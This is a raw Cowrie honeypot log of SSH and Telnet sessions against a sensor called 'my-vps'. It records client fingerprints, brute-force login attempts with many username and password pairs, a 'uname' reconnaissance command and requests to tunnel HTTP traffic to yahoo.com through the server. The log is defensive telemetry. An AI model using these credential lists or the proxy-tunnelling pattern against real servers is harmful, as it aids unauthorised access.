ert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T02:36:57.147862Z","src_ip":"212.227.235.229","session":"617efb076ca2"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:36:57.534906Z","src_ip":"212.227.235.229","session":"617efb076ca2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T02:36:57.664375Z","session":"617efb076ca2"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55890,"dst_ip":"1.2.3.4","dst_port":22,"session":"080b21aa3f38","protocol":"ssh","message":"New connection: 217.72.205.35:55890 (1.2.3.4:22) [session: 080b21aa3f38]","sensor":"my-vps","timestamp":"2025-08-26T02:37:14.991580Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:37:14.992697Z","src_ip":"217.72.205.35","session":"080b21aa3f38"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:38:07.018651Z","src_ip":"212.227.235.229","session":"617efb076ca2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33354,"dst_ip":"1.2.3.4","dst_port":23,"session":"8b6b7326ba63","protocol":"telnet","message":"New connection: 212.227.235.229:33354 (1.2.3.4:23) [session: 8b6b7326ba63]","sensor":"my-vps","timestamp":"2025-08-26T02:39:08.598460Z"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":20541,"dst_ip":"1.2.3.4","dst_port":22,"session":"2bd8b82d7402","protocol":"ssh","message":"New connection: 80.94.95.112:20541 (1.2.3.4:22) [session: 2bd8b82d7402]","sensor":"my-vps","timestamp":"2025-08-26T02:39:32.392575Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T02:39:32.393550Z","src_ip":"80.94.95.112","session":"2bd8b82d7402"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T02:39:32.424450Z","src_ip":"80.94.95.112","session":"2bd8b82d7402"}
{"eventid":"cowrie.login.failed","username":"admin","password":"turk182","message":"login attempt [admin/turk182] failed","sensor":"my-vps","timestamp":"2025-08-26T02:39:32.634880Z","src_ip":"80.94.95.112","session":"2bd8b82d7402"}
{"eventid":"cowrie.login.failed","username":"admin","password":"tryagain","message":"login attempt [admin/tryagain] failed","sensor":"my-vps","timestamp":"2025-08-26T02:39:33.667453Z","src_ip":"80.94.95.112","session":"2bd8b82d7402"}
{"eventid":"cowrie.login.failed","username":"admin","password":"trekker","message":"login attempt [admin/trekker] failed","sensor":"my-vps","timestamp":"2025-08-26T02:39:34.700232Z","src_ip":"80.94.95.112","session":"2bd8b82d7402"}
{"eventid":"cowrie.login.failed","username":"admin","password":"tramp","message":"login attempt [admin/tramp] failed","sensor":"my-vps","timestamp":"2025-08-26T02:39:35.734090Z","src_ip":"80.94.95.112","session":"2bd8b82d7402"}
{"eventid":"cowrie.login.failed","username":"admin","password":"toonces","message":"login attempt [admin/toonces] failed","sensor":"my-vps","timestamp":"2025-08-26T02:39:36.766245Z","src_ip":"80.94.95.112","session":"2bd8b82d7402"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:39:37.798220Z","src_ip":"80.94.95.112","session":"2bd8b82d7402"}
{"eventid":"cowrie.session.closed","duration":31.336963415145874,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:39:39.935339Z","src_ip":"212.227.235.229","session":"8b6b7326ba63"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50142,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3419674d015","protocol":"ssh","message":"New connection: 212.227.125.160:50142 (1.2.3.4:22) [session: c3419674d015]","sensor":"my-vps","timestamp":"2025-08-26T02:39:45.972032Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T02:39:45.972707Z","src_ip":"212.227.125.160","session":"c3419674d015"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T02:39:46.022875Z","src_ip":"212.227.125.160","session":"c3419674d015"}
{"eventid":"cowrie.login.success","username":"root","password":"!@#$%^&*","message":"login attempt [root/!@#$%^&*] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:39:46.175406Z","src_ip":"212.227.125.160","session":"c3419674d015"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:39:46.330737Z","src_ip":"212.227.125.160","session":"c3419674d015"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T02:39:46.331484Z","src_ip":"212.227.125.160","session":"c3419674d015"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:39:46.383412Z","src_ip":"212.227.125.160","session":"c3419674d015"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:39:46.384474Z","src_ip":"212.227.125.160","session":"c3419674d015"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":42578,"dst_ip":"1.2.3.4","dst_port":22,"session":"1993bb8506fb","protocol":"ssh","message":"New connection: 45.88.8.215:42578 (1.2.3.4:22) [session: 1993bb8506fb]","sensor":"my-vps","timestamp":"2025-08-26T02:41:25.303404Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T02:41:26.072142Z","src_ip":"45.88.8.215","session":"1993bb8506fb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T02:41:26.072867Z","src_ip":"45.88.8.215","session":"1993bb8506fb"}
{"eventid":"cowrie.login.success","username":"root","password":"Kahlan@123","message":"login attempt [root/Kahlan@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:41:27.651649Z","src_ip":"45.88.8.215","session":"1993bb8506fb"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:41:28.206630Z","src_ip":"45.88.8.215","session":"1993bb8506fb"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.181","src_port":59990,"dst_ip":"1.2.3.4","dst_port":22,"session":"d48a1ca75544","protocol":"ssh","message":"New connection: 93.123.109.181:59990 (1.2.3.4:22) [session: d48a1ca75544]","sensor":"my-vps","timestamp":"2025-08-26T02:41:47.392121Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T02:41:47.392889Z","src_ip":"93.123.109.181","session":"d48a1ca75544"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T02:41:47.412263Z","src_ip":"93.123.109.181","session":"d48a1ca75544"}
{"eventid":"cowrie.login.failed","username":"solv","password":"123456","message":"login attempt [solv/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T02:41:47.471264Z","src_ip":"93.123.109.181","session":"d48a1ca75544"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:41:48.492338Z","src_ip":"93.123.109.181","session":"d48a1ca75544"}
{"eventid":"cowrie.session.connect","src_ip":"89.248.172.16","src_port":46444,"dst_ip":"1.2.3.4","dst_port":23,"session":"b1b36f3c599e","protocol":"telnet","message":"New connection: 89.248.172.16:46444 (1.2.3.4:23) [session: b1b36f3c599e]","sensor":"my-vps","timestamp":"2025-08-26T02:43:49.814501Z"}
{"eventid":"cowrie.session.connect","src_ip":"89.248.172.16","src_port":46450,"dst_ip":"1.2.3.4","dst_port":23,"session":"98912e1a730b","protocol":"telnet","message":"New connection: 89.248.172.16:46450 (1.2.3.4:23) [session: 98912e1a730b]","sensor":"my-vps","timestamp":"2025-08-26T02:43:50.672536Z"}
{"eventid":"cowrie.session.closed","duration":0.0012421607971191406,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:43:50.673699Z","src_ip":"89.248.172.16","session":"98912e1a730b"}
{"eventid":"cowrie.session.closed","duration":0.8840489387512207,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:43:50.698476Z","src_ip":"89.248.172.16","session":"b1b36f3c599e"}
{"eventid":"cowrie.session.connect","src_ip":"89.248.172.16","src_port":46460,"dst_ip":"1.2.3.4","dst_port":23,"session":"d60209ea9f95","protocol":"telnet","message":"New connection: 89.248.172.16:46460 (1.2.3.4:23) [session: d60209ea9f95]","sensor":"my-vps","timestamp":"2025-08-26T02:43:50.710981Z"}
{"eventid":"cowrie.session.closed","duration":0.016412973403930664,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:43:50.727332Z","src_ip":"89.248.172.16","session":"d60209ea9f95"}
{"eventid":"cowrie.session.connect","src_ip":"89.248.172.16","src_port":46470,"dst_ip":"1.2.3.4","dst_port":23,"session":"a95b6a28e4e1","protocol":"telnet","message":"New connection: 89.248.172.16:46470 (1.2.3.4:23) [session: a95b6a28e4e1]","sensor":"my-vps","timestamp":"2025-08-26T02:43:50.806221Z"}
{"eventid":"cowrie.session.closed","duration":0.001291513442993164,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:43:50.807418Z","src_ip":"89.248.172.16","session":"a95b6a28e4e1"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52100,"dst_ip":"1.2.3.4","dst_port":22,"session":"d8627202884b","protocol":"ssh","message":"New connection: 217.72.205.35:52100 (1.2.3.4:22) [session: d8627202884b]","sensor":"my-vps","timestamp":"2025-08-26T02:43:56.408934Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:43:56.410155Z","src_ip":"217.72.205.35","session":"d8627202884b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43772,"dst_ip":"1.2.3.4","dst_port":23,"session":"e3ca24544c62","protocol":"telnet","message":"New connection: 212.227.125.160:43772 (1.2.3.4:23) [session: e3ca24544c62]","sensor":"my-vps","timestamp":"2025-08-26T02:46:46.461281Z"}
{"eventid":"cowrie.session.closed","duration":12.619508981704712,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:46:59.080711Z","src_ip":"212.227.125.160","session":"e3ca24544c62"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44078,"dst_ip":"1.2.3.4","dst_port":23,"session":"5261ee6478dc","protocol":"telnet","message":"New connection: 212.227.125.160:44078 (1.2.3.4:23) [session: 5261ee6478dc]","sensor":"my-vps","timestamp":"2025-08-26T02:46:59.290794Z"}
{"eventid":"cowrie.session.closed","duration":12.78893494606018,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:47:12.079653Z","src_ip":"212.227.125.160","session":"5261ee6478dc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44405,"dst_ip":"1.2.3.4","dst_port":23,"session":"f99de8209c06","protocol":"telnet","message":"New connection: 212.227.125.160:44405 (1.2.3.4:23) [session: f99de8209c06]","sensor":"my-vps","timestamp":"2025-08-26T02:47:12.304703Z"}
{"eventid":"cowrie.session.closed","duration":12.766226053237915,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:47:25.070858Z","src_ip":"212.227.125.160","session":"f99de8209c06"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44723,"dst_ip":"1.2.3.4","dst_port":23,"session":"69c27456a79b","protocol":"telnet","message":"New connection: 212.227.125.160:44723 (1.2.3.4:23) [session: 69c27456a79b]","sensor":"my-vps","timestamp":"2025-08-26T02:47:25.271522Z"}
{"eventid":"cowrie.session.connect","src_ip":"210.236.249.126","src_port":39982,"dst_ip":"1.2.3.4","dst_port":22,"session":"565c3735379c","protocol":"ssh","message":"New connection: 210.236.249.126:39982 (1.2.3.4:22) [session: 565c3735379c]","sensor":"my-vps","timestamp":"2025-08-26T02:47:25.862418Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T02:47:25.930840Z","src_ip":"210.236.249.126","session":"565c3735379c"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T02:47:26.172355Z","src_ip":"210.236.249.126","session":"565c3735379c"}
{"eventid":"cowrie.login.success","username":"root","password":" ","message":"login attempt [root/ ] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:47:27.145772Z","src_ip":"210.236.249.126","session":"565c3735379c"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:47:27.522919Z","src_ip":"210.236.249.126","session":"565c3735379c"}
{"eventid":"cowrie.session.closed","duration":12.784880638122559,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:47:38.056322Z","src_ip":"212.227.125.160","session":"69c27456a79b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45034,"dst_ip":"1.2.3.4","dst_port":23,"session":"81f171093884","protocol":"telnet","message":"New connection: 212.227.125.160:45034 (1.2.3.4:23) [session: 81f171093884]","sensor":"my-vps","timestamp":"2025-08-26T02:47:38.284410Z"}
{"eventid":"cowrie.session.closed","duration":12.779426336288452,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:47:51.063763Z","src_ip":"212.227.125.160","session":"81f171093884"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45341,"dst_ip":"1.2.3.4","dst_port":23,"session":"69f93405707f","protocol":"telnet","message":"New connection: 212.227.125.160:45341 (1.2.3.4:23) [session: 69f93405707f]","sensor":"my-vps","timestamp":"2025-08-26T02:47:51.284316Z"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":41643,"dst_ip":"1.2.3.4","dst_port":22,"session":"37a536d48b0a","protocol":"ssh","message":"New connection: 213.209.150.239:41643 (1.2.3.4:22) [session: 37a536d48b0a]","sensor":"my-vps","timestamp":"2025-08-26T02:47:52.218333Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:47:52.228185Z","src_ip":"213.209.150.239","session":"37a536d48b0a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T02:47:52.275598Z","src_ip":"213.209.150.239","session":"37a536d48b0a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:47:52.557857Z","src_ip":"213.209.150.239","session":"37a536d48b0a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":21133,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:21133","sensor":"my-vps","timestamp":"2025-08-26T02:47:52.615626Z","session":"37a536d48b0a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T02:47:52.672247Z","src_ip":"213.209.150.239","session":"37a536d48b0a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":650,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:650","sensor":"my-vps","timestamp":"2025-08-26T02:47:52.826833Z","session":"37a536d48b0a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T02:47:52.883318Z","src_ip":"213.209.150.239","session":"37a536d48b0a"}
